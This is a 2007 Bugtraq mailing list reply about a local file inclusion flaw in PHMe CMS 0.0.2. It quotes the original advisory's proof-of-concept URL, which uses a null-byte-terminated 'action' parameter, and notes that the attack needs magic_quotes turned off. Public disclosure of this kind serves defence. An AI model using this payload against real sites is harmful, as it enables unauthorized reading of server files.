Bugtraq mailing list archives
Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
From: BlackHawk <hawkgotyou () gmail com>
Date: Mon, 23 Jul 2007 18:57:44 +0200
Hello h4ck3riran, looks like you need mq=off to make this attack.. and this is quite impossible a tthe time because is defailt on.. Monday, July 23, 2007, 4:04:41 PM, you wrote:
# Tilte: PHMe CMS 0.0.2 local File Include Vulnerabilitiy
# <www.Aria-security.Com For English > # <www.Aria-Security.net For Persian > # < Author: You_You > # < Software: PHMe CMS > # < Site Script: http://sourceforge.net/projects/phme >
proof Of Concept : www.example.com/[path]/resources/function_list.php?action=[Local Script]%00
-- Best regards, BlackHawk mailto:hawkgotyou () gmail com
Current thread:
- PHMe CMS 0.0.2 local File Include Vulnerabilitiy h4ck3riran (Jul 23)
- Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy BlackHawk (Jul 23)